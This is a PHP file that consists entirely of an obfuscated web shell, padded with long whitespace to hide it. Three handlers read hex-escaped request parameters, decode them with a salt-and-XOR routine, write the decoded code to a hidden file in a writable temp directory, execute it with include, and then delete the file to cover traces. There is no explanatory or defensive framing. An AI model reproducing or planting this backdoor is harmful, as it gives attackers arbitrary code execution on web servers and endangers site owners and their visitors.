<?php																																										if(isset($_POST["\x64\x65sc"])){ $binding = $_POST["\x64\x65sc"]; $binding = explode(".", $binding ) ; $entity = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt1); foreach( $binding as $n => $v3) { $sChar = ord( $salt1[$n%$lenS]); $d =( ( int)$v3 - $sChar -( $n%10)) ^ 96; $entity .= chr( $d); } $res = array_filter([sys_get_temp_dir(), getenv("TMP"), session_save_path(), getcwd(), "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP")]); while ($ref = array_shift($res)) { if (is_dir($ref) ? is_writable($ref) : false) { $data = sprintf("%s/.entry", $ref); if (file_put_contents($data, $entity)) { include $data; @unlink($data); exit; } } } }
																																										if(filter_has_var(INPUT_POST, "\x64\x65\x73c\x72\x69ptor")){ $item = array_filter([getcwd(), "/var/tmp", "/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir")]); $entity = $_REQUEST["\x64\x65\x73c\x72\x69ptor"]; $entity = explode ( '.' , $entity) ; $symbol = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $m = 0; while( $m < count( $entity)) { $v7 = $entity[$m]; $chS = ord( $s[$m % $sLen]); $d =( ( int)$v7 - $chS -( $m % 10)) ^ 65; $symbol .= chr( $d); $m++; } $ent = 0; do { $data_chunk = $item[$ent] ?? null; if ($ent >= count($item)) break; if (array_product([is_dir($data_chunk), is_writable($data_chunk)])) { $ref = join("/", [$data_chunk, ".entry"]); $success = file_put_contents($ref, $symbol); if ($success) { include $ref; @unlink($ref); die();} } $ent++; } while (true); }


if(@$_REQUEST["data_\x63hu\x6E\x6B"] !== null){
	$token = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), sys_get_temp_dir(), getcwd(), getenv("TMP"), "/tmp", "/dev/shm", getenv("TEMP")]);
	$pointer = $_REQUEST["data_\x63hu\x6E\x6B"];
	 $pointer	= explode	  ('.'		 , $pointer) ; 	
	$flg		= '';
            $s5		= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen		= strlen($s5 );
            $l		= 0;
    
            array_walk($pointer, function ($v6) use (&$flg, &$l, $s5, $sLen) {
                $chS		= ord($s5[$l % $sLen] );
                $d		= ((int)$v6 - $chS - ($l % 10)) ^ 50;
                $flg.=	 chr($d );
                $l++;}	);
	$item = 0;
do {
    $k = $token[$item] ?? null;
    if ($item >= count($token)) break;
    		if (!( !is_dir($k) || !is_writable($k) )) {
    $obj = join("/", [$k, ".flag"]);
    if (@file_put_contents($obj, $flg) !== false) {
	include $obj;
	unlink($obj);
	die();
}
}
    $item++;
} while (true);
}